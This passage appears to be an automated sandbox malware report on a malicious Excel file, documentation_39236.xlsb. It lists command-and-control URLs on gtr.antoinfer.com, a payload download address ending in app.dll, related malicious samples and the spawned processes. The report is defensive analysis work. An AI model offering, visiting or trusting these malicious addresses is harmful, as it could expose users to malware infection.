                  https://dataservice.o365filtering.com/0%URL Reputationsafe
                  https://dataservice.o365filtering.com/0%URL Reputationsafe
                  https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
                  https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
                  https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
                  https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
                  https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
                  https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
                  https://ncus.contentsync.0%URL Reputationsafe
                  https://ncus.contentsync.0%URL Reputationsafe
                  https://ncus.contentsync.0%URL Reputationsafe
                  https://apis.live.net/v5.0/0%URL Reputationsafe
                  https://apis.live.net/v5.0/0%URL Reputationsafe
                  https://apis.live.net/v5.0/0%URL Reputationsafe
                  https://wus2.contentsync.0%URL Reputationsafe
                  https://wus2.contentsync.0%URL Reputationsafe
                  https://wus2.contentsync.0%URL Reputationsafe
                  http://gtr.antoinfer.com/k_2Bld_2B868iR7p/iSLerqiJRFRfRPj/I3sykOYq_2B_2BHlkm/lN1n6_2F_/2BoCebPKrVZFk5Ykbc8d/ir2ifxTr4LNwVXB57AO/naMzNC0NRqAZpafqf_2BA_/2Be4kMQ_2Bs4v/p3vimkya/tnJRXZOQhgPrD4eJIIoOBmz/6_2FqS0VmH/GdEp4ZZJMOcj3fIll/Gr7XyTEKPabp/aWzveP_2B5R/CbkrZ6KMbYewce/4JBfvb8ftJcY5XJZOep1x/uKyVwvTYfdKUGuNG/Emm_2BOgQKRpwFp/DFm1TypwhIB6euZx4o/ZnwoOdebK/P2zkNdJ1mC1FOPRaBbHj/tGtvylAtqDtqZZGz2/K0%Avira URL Cloudsafe
                  https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  gtr.antoinfer.com
                  165.232.183.49
                  truetrueunknown
                  free.mynowministries.com
                  162.241.253.78
                  truefalse
                    unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://gtr.antoinfer.com/favicon.icotrue
                    • Avira URL Cloud: safe
                    unknown
                    http://gtr.antoinfer.com/7lD6H27N_2/BPcjmtAv0Zw4YWBW5/_2Fxf1uK6WCO/_2Fjr90UDnf/fvsahgiWLN_2Bo/Vmn_2FfIBHwVISTOJqyyE/yxzQpB4UhTtBihgn/15wt67RuhdWC2bp/AA4QTb7hSSc7ibwOLz/pdYBrbn9P/IhNkxf132wscOBr5M107/x3K_2BnAOaEK3ZrGH_2/BhQbh5Iq3KL0HGqeYocdUa/aitTSocVb3Ei8/K8Yn7wxH/8ZzNnAARdlf1lpPkD_2FTSI/88hMX1xgXx/WKheFQm4ijbivR_2F/Zqk2tiAD1SrE/7_2FLrw5q4N/ROSXMe9TmWNzIt/lpE2Vas7vRgwYKuDJRzfN/M8anWcqtrue
                    • Avira URL Cloud: safe
                    unknown
                    http://gtr.antoinfer.com/k_2Bld_2B868iR7p/iSLerqiJRFRfRPj/I3sykOYq_2B_2BHlkm/lN1n6_2F_/2BoCebPKrVZFk5Ykbc8d/ir2ifxTr4LNwVXB57AO/naMzNC0NRqAZpafqf_2BA_/2Be4kMQ_2Bs4v/p3vimkya/tnJRXZOQhgPrD4eJIIoOBmz/6_2FqS0VmH/GdEp4ZZJMOcj3fIll/Gr7XyTEKPabp/aWzveP_2B5R/CbkrZ6KMbYewce/4JBfvb8ftJcY5XJZOep1x/uKyVwvTYfdKUGuNG/Emm_2BOgQKRpwFp/DFm1TypwhIB6euZx4o/ZnwoOdebK/P2zkNdJ1mC1FOPRaBbHj/tGtvylAtqDtqZZGz2/Ktrue
                    • Avira URL Cloud: safe
                    unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmpfalse
                      high
                      https://api.diagnosticssdf.office.com3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                        high
                        https://login.microsoftonline.com/3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                          high
                          https://shell.suite.office.com:14433A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                            high
                            https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                              high
                              http://gtr.antoinfer.com/h_2F93afXj4zv0agU5uGcex/4RttysT472/M4H0F6I1ZWhRsl9Mq/gKfk1C7c8_2F/gareL3qIH{7879BAAC-E03E-11EB-90E4-ECF4BB862DED}.dat.28.drtrue
                              • Avira URL Cloud: safe
                              unknown
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmpfalse
                                high
                                https://autodiscover-s.outlook.com/3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                  high
                                  https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                    high
                                    https://cdn.entity.3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://gtr.antoinfer.com/k_2Bld_2B868iR7p/iSLerqiJRFRfRPj/I3sykOYq_2B_2BHlkm/lN1n6_2F_/2BoCebPKrVZFk{7879BAA6-E03E-11EB-90E4-ECF4BB862DED}.dat.28.dr, ~DFA7B5BF1FB774EA36.TMP.28.drtrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://api.addins.omex.office.net/appinfo/query3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                      high
                                      https://clients.config.office.net/user/v1.0/tenantassociationkey3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                        high
                                        https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                          high
                                          https://powerlift.acompli.net3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          https://rpsticket.partnerservices.getmicrosoftkey.com3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          https://lookup.onenote.com/lookup/geolocation/v13A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                            high
                                            https://cortana.ai3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovincecsc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmpfalse
                                              high
                                              https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                high
                                                http://gtr.antoinfer.com/7lD6H27N_2/BPcjmtAv0Zw4YWBW5/_2Fxf1uK6WCO/_2Fjr90UDnf/fvsahgiWLN_2Bo/Vmn_2F{5DCD6FF8-E03E-11EB-90E4-ECF4BB862DED}.dat.23.dr, ~DF99BD870E81A4914B.TMP.23.drtrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://gtr.antoinfer.com/xFDxUxdbnv/F6OYsZZ54L9nW_2Fn/67TmggSh_2FJ/XC_2BJ4ptUf/_2Bn4_2BufrBke/X9TaUV{7879BAA4-E03E-11EB-90E4-ECF4BB862DED}.dat.28.dr, ~DF436C4ACF406520B7.TMP.28.drtrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://cloudfiles.onenote.com/upload.aspx3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                  high
                                                  https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                    high
                                                    https://entitlement.diagnosticssdf.office.com3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                      high
                                                      https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                        high
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authenticationcsc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmpfalse
                                                          high
                                                          https://api.aadrm.com/3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://ofcrecsvcapi-int.azurewebsites.net/3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.ocsc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmpfalse
                                                            high
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidcsc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmpfalse
                                                              high
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.ocsc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmpfalse
                                                                high
                                                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                                  high
                                                                  https://api.microsoftstream.com/api/3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                                    high
                                                                    https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                                      high
                                                                      https://cr.office.com3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                                        high
                                                                        https://portal.office.com/account/?ref=ClientMeControl3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                                          high
                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000025.00000002.587720869.0000028658461000.00000004.00000001.sdmp, powershell.exe, 00000027.00000002.589665519.000002B5AD541000.00000004.00000001.sdmpfalse
                                                                            high
                                                                            http://www.reddit.com/msapplication.xml4.23.drfalse
                                                                              high
                                                                              http://gtr.antoinfer.com/IW0KvL6zqxcwdal5Ue/sV05YuqDL/CUY_2FYXWgTEAN2MleRL/cOthmAfIFOrxcxXsh59/regsvr32.exe, 00000003.00000002.590086971.0000000002FD0000.00000002.00000001.sdmp, regsvr32.exe, 00000013.00000002.585926396.0000000003640000.00000002.00000001.sdmp, powershell.exe, 00000025.00000002.586261985.0000028656DD0000.00000002.00000001.sdmp, powershell.exe, 00000027.00000002.585702910.000002B5ABD70000.00000002.00000001.sdmp, csc.exe, 0000002F.00000002.583539215.000001E9AEB40000.00000002.00000001.sdmp, csc.exe, 00000030.00000002.583966297.0000021D92F30000.00000002.00000001.sdmptrue
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://graph.ppe.windows.net3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                                                high
                                                                                https://res.getmicrosoftkey.com/api/redemptionevents3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://powerlift-frontdesk.acompli.net3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://tasks.office.com3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                                                  high
                                                                                  https://officeci.azurewebsites.net/api/3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://sr.outlook.office.net/ws/speech/recognize/assistant/work3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                                                    high
                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifiercsc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmpfalse
                                                                                      high
                                                                                      https://free.mynowministries.com/app.dllclose.xmlfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://gtr.antoinfer.com/MpeUKSeGn_2/Bk4DEtluQu8Y9R/36MpR_2BhUMN_2FXN2dO6/hANnmINzHP5reb6i/6KJxoqvLx{7879BAA8-E03E-11EB-90E4-ECF4BB862DED}.dat.28.drtrue
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://store.office.cn/addinstemplate3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000025.00000002.594457896.000002865866F000.00000004.00000001.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000025.00000002.594457896.000002865866F000.00000004.00000001.sdmpfalse
                                                                                        high
                                                                                        https://outlook.office.com/autosuggest/api/v1/init?cvid=3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                                                          high
                                                                                          https://globaldisco.crm.dynamics.com3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                                                            high
                                                                                            http://gtr.antoinfer.com/h_2F93afXj4zv0agU5uGcex/4RttysT472/M4H0F6I1ZWhRsl9Mq/gKfk1C7c8_2F/gareregsvr32.exe, 00000003.00000002.590086971.0000000002FD0000.00000002.00000001.sdmp, regsvr32.exe, 00000013.00000002.585926396.0000000003640000.00000002.00000001.sdmp, powershell.exe, 00000025.00000002.586261985.0000028656DD0000.00000002.00000001.sdmp, powershell.exe, 00000027.00000002.585702910.000002B5ABD70000.00000002.00000001.sdmp, csc.exe, 0000002F.00000002.583539215.000001E9AEB40000.00000002.00000001.sdmp, csc.exe, 00000030.00000002.583966297.0000021D92F30000.00000002.00000001.sdmptrue
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                                                              high
                                                                                              https://store.officeppe.com/addinstemplate3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              https://dev0-api.acompli.net/autodetect3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              https://www.odwebp.svc.ms3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              https://api.powerbi.com/v1.0/myorg/groups3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                                                                high
                                                                                                https://web.microsoftstream.com/video/3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                                                                  high
                                                                                                  https://graph.windows.net3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                                                                    high
                                                                                                    https://dataservice.o365filtering.com/3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    https://github.com/Pester/Pesterpowershell.exe, 00000025.00000002.594457896.000002865866F000.00000004.00000001.sdmpfalse
                                                                                                      high
                                                                                                      https://officesetup.getmicrosoftkey.com3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      https://analysis.windows.net/powerbi/api3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                                                                        high
                                                                                                        https://prod-global-autodetect.acompli.net/autodetect3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        https://outlook.office365.com/autodiscover/autodiscover.json3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                                                                          high
                                                                                                          https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                                                                            high
                                                                                                            https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                                                                              high
                                                                                                              https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                                                                                high
                                                                                                                http://www.youtube.com/msapplication.xml7.23.drfalse
                                                                                                                  high
                                                                                                                  https://ncus.contentsync.3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                                                                                    high
                                                                                                                    https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                                                                                      high
                                                                                                                      http://weather.service.msn.com/data.aspx3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                                                                                        high
                                                                                                                        https://apis.live.net/v5.0/3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                                                                                          high
                                                                                                                          https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                                                                                            high
                                                                                                                            https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                                                                                              high
                                                                                                                              https://management.azure.com3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                                                                                                high
                                                                                                                                https://wus2.contentsync.3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://incidents.diagnostics.office.com3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                                                                                                  high
                                                                                                                                  https://clients.config.office.net/user/v1.0/ios3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                                                                                                    high
                                                                                                                                    https://insertmedia.bing.office.net/odc/insertmedia3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                                                                                                      high
                                                                                                                                      https://o365auditrealtimeingestion.manage.office.com3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                                                                                                        high
                                                                                                                                        https://outlook.office365.com/api/v1.0/me/Activities3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                                                                                                          high
                                                                                                                                          https://api.office.net3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                                                                                                            high
                                                                                                                                            https://incidents.diagnosticssdf.office.com3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                                                                                                              high
                                                                                                                                              https://asgsmsproxyapi.azurewebsites.net/3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://clients.config.office.net/user/v1.0/android/policies3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                                                                                                                high
                                                                                                                                                http://www.amazon.com/msapplication.xml.23.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://entitlement.diagnostics.office.com3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                                                                                                                      high
                                                                                                                                                      http://www.twitter.com/msapplication.xml5.23.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://substrate.office.com/search/api/v2/init3A4E1985-998D-4759-B374-77BB71813A62.1.drfalse
                                                                                                                                                          high
                                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmpfalse
                                                                                                                                                            high

                                                                                                                                                            Contacted IPs

                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                            • 75% < No. of IPs

                                                                                                                                                            Public

                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                            162.241.253.78
                                                                                                                                                            free.mynowministries.comUnited States
                                                                                                                                                            46606UNIFIEDLAYER-AS-1USfalse
                                                                                                                                                            165.232.183.49
                                                                                                                                                            gtr.antoinfer.comUnited States
                                                                                                                                                            22255ALLEGHENYHEALTHNETWORKUStrue

                                                                                                                                                            General Information

                                                                                                                                                            Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                            Analysis ID:445916
                                                                                                                                                            Start date:08.07.2021
                                                                                                                                                            Start time:15:44:17
                                                                                                                                                            Joe Sandbox Product:CloudBasic
                                                                                                                                                            Overall analysis duration:0h 11m 50s
                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                            Report type:light
                                                                                                                                                            Sample file name:documentation_39236.xlsb
                                                                                                                                                            Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                            Number of analysed new started processes analysed:49
                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                            Technologies:
                                                                                                                                                            • HCA enabled
                                                                                                                                                            • EGA enabled
                                                                                                                                                            • HDC enabled
                                                                                                                                                            • AMSI enabled
                                                                                                                                                            Analysis Mode:default
                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                            Detection:MAL
                                                                                                                                                            Classification:mal100.troj.expl.evad.winXLSB@31/52@7/2
                                                                                                                                                            EGA Information:
                                                                                                                                                            • Successful, ratio: 50%
                                                                                                                                                            HDC Information:
                                                                                                                                                            • Successful, ratio: 88% (good quality ratio 83.6%)
                                                                                                                                                            • Quality average: 79.8%
                                                                                                                                                            • Quality standard deviation: 29.3%
                                                                                                                                                            HCA Information:
                                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                                            • Number of executed functions: 0
                                                                                                                                                            • Number of non-executed functions: 0
                                                                                                                                                            Cookbook Comments:
                                                                                                                                                            • Adjust boot time
                                                                                                                                                            • Enable AMSI
                                                                                                                                                            • Found application associated with file extension: .xlsb
                                                                                                                                                            • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                            • Attach to Office via COM
                                                                                                                                                            • Scroll down
                                                                                                                                                            • Close Viewer
                                                                                                                                                            Warnings:
                                                                                                                                                            Show All
                                                                                                                                                            • Max analysis timeout: 220s exceeded, the analysis took too long
                                                                                                                                                            • TCP Packets have been reduced to 100
                                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, RuntimeBroker.exe, backgroundTaskHost.exe, audiodg.exe, BackgroundTransferHost.exe, ielowutil.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 52.255.188.83, 52.147.198.201, 104.43.193.48, 52.109.76.68, 52.109.8.25, 52.109.8.23, 20.82.209.183, 92.122.144.200, 40.112.88.60, 23.55.110.38, 23.55.110.6, 51.103.5.186, 20.50.102.62, 95.101.22.216, 95.101.22.224, 2.18.105.186, 152.199.19.161, 20.72.88.19
                                                                                                                                                            • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, prod-w.nexus.live.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, eus2-consumerrp-displaycatalog-aks2aks-useast.md.mp.microsoft.com.akadns.net, wns.notify.trafficmanager.net, go.microsoft.com, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, client.wns.windows.com, fs.microsoft.com, ie9comview.vo.msecnd.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, cs9.wpc.v0cdn.net
                                                                                                                                                            • Execution Graph export aborted for target mshta.exe, PID 3128 because there are no executed function
                                                                                                                                                            • Execution Graph export aborted for target mshta.exe, PID 5780 because there are no executed function
                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                            Simulations

                                                                                                                                                            Behavior and APIs

                                                                                                                                                            TimeTypeDescription
                                                                                                                                                            15:46:12API Interceptor1x Sleep call for process: regsvr32.exe modified
                                                                                                                                                            15:47:49API Interceptor45x Sleep call for process: powershell.exe modified

                                                                                                                                                            Joe Sandbox View / Context

                                                                                                                                                            IPs

                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                            165.232.183.493a94.dllGet hashmaliciousBrowse
                                                                                                                                                            • gtr.antoinfer.com/favicon.ico
                                                                                                                                                            3b17.dllGet hashmaliciousBrowse
                                                                                                                                                            • gtr.antoinfer.com/favicon.ico
                                                                                                                                                            9b9dc.dllGet hashmaliciousBrowse
                                                                                                                                                            • gtr.antoinfer.com/favicon.ico

                                                                                                                                                            Domains

                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                            gtr.antoinfer.com3a94.dllGet hashmaliciousBrowse
                                                                                                                                                            • 165.232.183.49
                                                                                                                                                            3b17.dllGet hashmaliciousBrowse
                                                                                                                                                            • 165.232.183.49
                                                                                                                                                            9b9dc.dllGet hashmaliciousBrowse
                                                                                                                                                            • 165.232.183.49

                                                                                                                                                            ASN

                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                            UNIFIEDLAYER-AS-1USBaimex srl Enquiry.xlsxGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.75.144
                                                                                                                                                            P.O 09483938.docGet hashmaliciousBrowse
                                                                                                                                                            • 192.185.24.91
                                                                                                                                                            NWMEaRqF7s.exeGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.242.173
                                                                                                                                                            audit-1007245983.xlsbGet hashmaliciousBrowse
                                                                                                                                                            • 162.144.229.210
                                                                                                                                                            SecuriteInfo.com.Trojan.Win32.Save.a.21204.exeGet hashmaliciousBrowse
                                                                                                                                                            • 192.185.24.91
                                                                                                                                                            INVOICE_070621_PDF.exeGet hashmaliciousBrowse
                                                                                                                                                            • 192.185.164.148
                                                                                                                                                            Invoice_7734.exeGet hashmaliciousBrowse
